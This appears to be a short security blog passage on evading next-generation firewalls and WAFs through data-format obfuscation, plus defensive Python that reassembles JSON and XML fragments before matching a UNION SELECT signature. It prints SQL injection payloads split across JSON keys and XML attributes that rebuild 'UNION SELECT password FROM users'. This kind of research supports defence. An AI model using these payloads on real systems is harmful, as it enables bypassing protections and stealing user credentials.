Bypassing NGFW/WAFs using data format obfuscations

  1. Using the Content-Type header
  2. Using the first suitable data format
  3. Requiring manual configuration of the data format for each field
?jdata={"json":"here"}

?injection={"'union/*":"*/select", ",2,password, ":" FROM users;#"}
' UNION SELECT 1,2,password,4 FROM users--a-
SQL injection payload encoded as valid JSON data (the raw SQL it reassembles to is shown beneath it)

<?xml version="1.0"?><a att1="'union/*" att2="*/select" att3=",username," att4=" FROM user;#">I'm an XML. Trust me!</a>
SQL injection payload encoded as valid XML data
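The defensive counterpart to the two payloads above, added here as an example that is not part of the original post: a small Python check that parses a query parameter as JSON, then as XML, and runs a signature over the reassembled key/value fragments rather than over each field on its own. The sample inputs are constructed from the payloads shown on this page and the UNION/SELECT pattern is a deliberately narrow illustrative signature, not a production rule.

```python
import json
import re
import xml.etree.ElementTree as ET

# Constructed samples modelled on the two payloads shown above.
JSON_SAMPLE = '{"\'union/*":"*/select", ",2,password, ":" FROM users;#"}'
XML_SAMPLE = ('<?xml version="1.0"?><a att1="\'union/*" att2="*/select" '
              'att3=",username," att4=" FROM user;#">I\'m an XML. Trust me!</a>')
# Narrow illustrative signature: UNION ... SELECT with whitespace or /* */ between.
UNION_SELECT = re.compile(r"union(\s|/\*.*?\*/)*select", re.IGNORECASE)

def json_fragments(obj):
    """Every string used as a key or scalar value, in document order."""
    out = []
    if isinstance(obj, dict):
        for k, v in obj.items():
            out.append(str(k))
            out.extend(json_fragments(v))
    elif isinstance(obj, list):
        for v in obj:
            out.extend(json_fragments(v))
    elif obj is not None:
        out.append(str(obj))
    return out

def xml_fragments(root):
    """Attribute values and text of every element, in document order."""
    out = []
    for el in root.iter():
        out.extend(el.attrib.values())
        if el.text and el.text.strip():
            out.append(el.text)
    return out

def fragments(value):
    """Parse as JSON, then as XML; fall back to the raw string."""
    for parse, walk in ((json.loads, json_fragments), (ET.fromstring, xml_fragments)):
        try:
            return walk(parse(value))
        except (ValueError, ET.ParseError):
            pass
    return [value]

def per_fragment_check(value):
    """What a parser that inspects each key/value alone sees: no single piece matches."""
    return any(UNION_SELECT.search(f) for f in fragments(value))

def reassembled_check(value):
    """Inspect the concatenation, so pieces split across a /* */ comment rejoin."""
    return bool(UNION_SELECT.search("".join(fragments(value))))
```

Keys are inspected as well as values because, as the JSON sample shows, the payload can be carried in either position.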

CEO at Wallarm. Application security platform to prevent threats and discover vulnerabilities in real time.

Ivan Novikov